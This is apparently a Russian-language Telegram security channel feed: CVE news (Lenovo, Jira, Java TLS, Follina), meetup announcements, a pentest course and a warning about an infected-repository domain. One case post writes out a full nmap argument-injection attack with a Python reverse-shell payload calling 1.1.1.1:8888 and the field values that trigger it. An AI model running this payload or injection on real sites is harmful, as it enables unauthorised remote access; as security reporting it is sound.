One brick to the IT world
782 subscribers
56 photos
7 videos
4 files
98 links
Download Telegram
Уязвимости найдены в около 100 разных версиях ноутбуков Lenovo. Идентификаторы CVE-2021-3970, CVE-2021-3971, CVE-2021-3972. Теоретически, это позволяет атакующему заразить компьютер вирусом, который не удаляется даже при форматировании жесткого диска.

Подробнее:
https://support.lenovo.com/ae/en/product_security/len-73440

#lenovo #nvram #bios

@onebrick
Atlassian исправили уязвимость (CVE-2022-0540) обхода авторизации в продуктах Jira с критичностью 9.9 из 10. По описанию, для эксплуатации нужны специальные настройки, но лучше не рисковать и обновиться.

Уязвимые версии:
- Jira Core Server, Software Server, and Software Data Center before 8.13.18, the 8.14.x, 8.15.x, 8.16.x, 8.17.x, 8.18.x, 8.19.x, 8.20.x before 8.20.6, and 8.21.x.
- Jira Service Management Server and Management Data Center before 4.13.18, the 4.14.x, 4.15.x, 4.16.x, 4.17.x, 4.18.x, 4.19.x, 4.20.x before 4.20.6, 4.21.x

Облачные версии Jira и Jira Service Management не подвержены.

Подробнее:
https://www.bleepingcomputer.com/news/security/atlassian-fixes-critical-jira-authentication-bypass-vulnerability/

#jira #bypass #critical

@onebrick
This media is not supported in your browser
VIEW IN TELEGRAM
Появился proof-of-concept для CVE-2022-21449, 0day уязвимости в Java. Уязвимость позволяет обойти проверку SSL сертификата, и выдать любой поддельный сайт за настоящий.

Например, представьте, что ваш софт на Java использует автообновления. Если у злоумышленника получится подменить IP сервера обновлений, несмотря на поддельный SSL сертификат, софт скачает обновления. Пример подмены google.com на видео.

Ссылка на proof-of-concept:
https://github.com/khalednassar/CVE-2022-21449-TLS-PoC

#java #0day #critical #exploit

@onebrick
@onebrick
@onebrick
🔥1
В open-source системе для медицинских организаций LibreHealth EHR 2.0.0 мной обнаружено несколько уязвимостей (там их должно быть еще очень много, но пока руки не доходят): одна SQL-инъекция и множественные XSS.

Были присвоены следующие идентификаторы: CVE-2022-29938, CVE-2022-29939, CVE-2022-29940.

Так как разработчики системы переходят на совершенно новую кодовую базу, для них неактуально исправлять эти уязвимости. Поэтому можно сказать, что это зиродеи.

Подробная информация по багам и по временному исправлению:
https://murat.one/?p=160

Ссылки на MITRE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29938
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29939
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29940

#php #librehealth #opensource #0day #exploit

@onebrick
🔥5
Forwarded from Thatskriptkid
r0crewKZ совместно с SolveChat расскажут доклады в Алматы, в Lenore Pub, 12 мая, в 19:00

Доклады:

1. Александр Ошлаков - "Пишем код в функциональном стиле. Как и главное Зачем"

2. Евгения Цыбренко - "Гибридные Криптобиржи: взгляд изнутри"

3. Thatskriptkid - "Решаем андроид крякми с помощью IDA"

4. novitoll - "gnuradio: Eins, zwei (G), Polizei, Drei (G), vier (G), Grenadier, Fünf (G)?"

5. Sh3lldon- Патчинг bin, elf и pe файлов с гидрой

6. sysadmin "Аваренесс о неявных превентивных сервисах"

Бесплатно, без стрима, без записи.

В конце мая доклады расскажем в Астане
👍2
Поздравляю, ребята! Вы лучшие👍
Forwarded from Positive Events
Media is too big
VIEW IN TELEGRAM
🏆 Кибербитва The Standoff подошла к концу, а вот и лучшие красные команды.

🥇 На 1-м месте команда Codeby — у них 27 715 баллов.

🥈 На 2-м — команда True0xA3 с 23 381 баллом.

🥉 На 3-м — команда Invuls, 12 352 балла.

🎉 Поздравляем победителей и благодарим всех участников, это было здорово!
🔥2
Forwarded from Thatskriptkid
Media is too big
VIEW IN TELEGRAM
r0crewKZ ⚔️ 2600

27 мая, в Астане, в BurgerShop, в 18:00 будут доклады!

1. SCAM STORIES 🌀 Morty

2. Трюки обхода AV-движков в разработке малварей. Примеры шифрования шеллкода 🌀 catv

3. 2G GSM, 4G LTE, 5G NR 🌀 novitoll

4. Attacking software developers 🌀 Thatskriptkid

Бесплатно, без записи, без стрима
Forwarded from SecAtor
День Х настал, и не говорите, что не предупреждали.

Исследователи Horizon3 сегодня опубликовали эксплойт (PoC) и технический анализ критической уязвимости CVE-2022-22972 для обхода аутентификации в vRealize Automation и получения прав администратора в продуктах VMware.

Как вы помните, большинство атак АРТ в 2021 году были связаны отнюдь не с уникальными 0-day, а основывались на эксплуатации общеизвестного набора уязвимостей, который пополнился достаточно простой в эксплуатации и эффективной CVE-2022-22972.

Похоже, что следующие посты по инцидентам с VMware будем начинать с того, что «а ведь мы предупреждали».
👍1
Forwarded from APT
🔥 MS-MSDT Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters). The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Research:
https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e

PoC:
https://github.com/JohnHammond/msdt-follina
https://github.com/chvancooten/follina.py

Demo Follina with Cobalt Strike:
https://www.youtube.com/watch?v=oM4GHtVvv1c

For BlueTeam:
https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2

#office #rce #msmsdt #nomacro
🔥1
Во время стажировки в NitroTeam (@nitroteamchat), студенты нашли множественные уязвимости в LibreHealth: Broken Access Control (CVE-2022-31496), Cross-Site Scripting (CVE-2022-31492, CVE-2022-31493, CVE-2022-31494, CVE-2022-31495, CVE-2022-31497, CVE-2022-31498).

Имена наших героев: Alibek Akhmetov, Bakdaulet Zhaksylyk, Daniyar Absadykov, Amir Askarov, Gaukhar Uzakbay.

Так как их менторством занимался я, решил опубликовать статью на своем блоге:
https://murat.one/?p=169

P.S. Завтра напишу короткий гайдлайн для тех, кто хочет оформить CVE для найденной уязвимости, и опубликую на канале.

#php #librehealth #opensource #0day #exploit

@onebrick
👍42
Долго думал, выкладывать тут или нет, и решился. Некоторое время назад преподавал студентам Astana IT University курс по этичному хакингу, а так как студентов было много, лекции были записаны в формате видео. Упор был сделан на возможность просмотра лекций для всех, т.е. не только для студентов, и планировалось, что по окончанию курса слушатели будут на уровне junior penetration tester.

Формат: 10% теория / 90% практика

Курс содержит 10 тем и связанные с ними домашние задания:
Неделя 1. Введение в коммерческий пентест. Создание рабочей среды
Неделя 2. Сбор информации. OSINT
Неделя 3. Техники социальной инженерии
Неделя 4. Безопасность web-приложений
Неделя 5. Атака на web-приложения. Автоматические инструменты
Неделя 6. Безопасность инфраструктуры. Разведка
Неделя 7. Атаки на инфраструктуру. Metasploit Framework
Неделя 8. Основы Android приложений и атаки на WiFi
Неделя 9. Платформы для обучения кибербезопасности
Неделя 10. Написание коммерческого отчета

Playlist на Youtube:
https://www.youtube.com/watch?v=oRflkcjm08U&list=PLsucn_wbSMY33VfVd1zSkwnNZQwqJminO

P.S. Так как я не диктор, возможно придется поставить скорость на 1.5 :)

@onebrick
🔥23👍41
This media is not supported in your browser
VIEW IN TELEGRAM
Взлом системы безопасности стрекозы

#nature #reallifepentest

@onebrick
👍5
Forwarded from b4tr_ch
Парень с Казахстана написал книгу по Malware Development. У Жасулана сейчас не простая ситуация, связанная с болезнью дочери и он через книгу собирает деньги на ее лечение.

Книга на английском языке. Возможно будет полезна и давайте поддержим парня. Электронная книга, стоимость всего 16 долларов.
У Жасулана так же есть Каспи: +77087235263 для тех кто просто хочет поддержать парня.
Очень давно был интересный кейс с сайтом для системных администраторов, где можно было проверить открыт ли порт сайта. Первое, что пришло голову, это вписать в IP:
127.0.0.1 -h
В результате сайт вернул мануал nmap-a. Но многие символы фильтровались и выйти за переделы команды nmap-а не удалось. После этого, путем проб и ошибок, был найден интересный вектор remote code execution.

В составе nmap есть модуль http-fetch, который умеет ходить по URL и скачивать файлы. Более того, можно даже указать куда сохранить файл. Немного покурив, как работают скрипты nmap, было обнаружено, что через функцию os.execute() можно выполнять команды.

0) На своем сервере открываем порт 8888:
nc -lvp 8888
Допустим IP вашего сервера 1.1.1.1

1) Создаем у себя на сервере файл index.php с содержимым:
os.execute("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.1.1.1\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")

2) Запускаем встроенный сервер php:
php -S 0.0.0.0:8080

3) На атакуемом сайте вместо IP пишем:
1.1.1.1 -script http-fetch
Вместо порта:
8080 -dd -script-args destination=/tmp

Т.е. на бэкенде сайта команда преобразуется в что-то типа:
nmap 1.1.1.1 -script http-fetch -p 8080  -dd -script-args destination=/tmp

В результате выполнения этой команды, по пути /tmp/1.1.1.1/8080/index.html будет лежат скрипт с первого шага.

4) Запускаем скачанный скрипт, вписав вместо порта:
8080 -dd -script /tmp/1.1.1.1/8080/index.html 
и получаем бэкконнект.

Таким образом, иногда необязательно выходить за рамки команды, вписывая такие символы, как | & ;.

Вот такой вот зиродей😁

#case #nmap #research #rce
👍12🔥1
Пишут, что заразили 35к репозиториев. Вредоносный код крадет все конфиги и выполняет произвольные команды.

Рекомендую поискать в коде (включая все библиотеки, в т.ч. node_modules и т.д.) домен

ovz1.j19544519.pr46m.vps.myjino.ru

Если он есть, откатывайтесь, меняйте все пароли и ключи.

Источник:
https://mobile.twitter.com/stephenlacy/status/1554697077430505473

#infected
👍6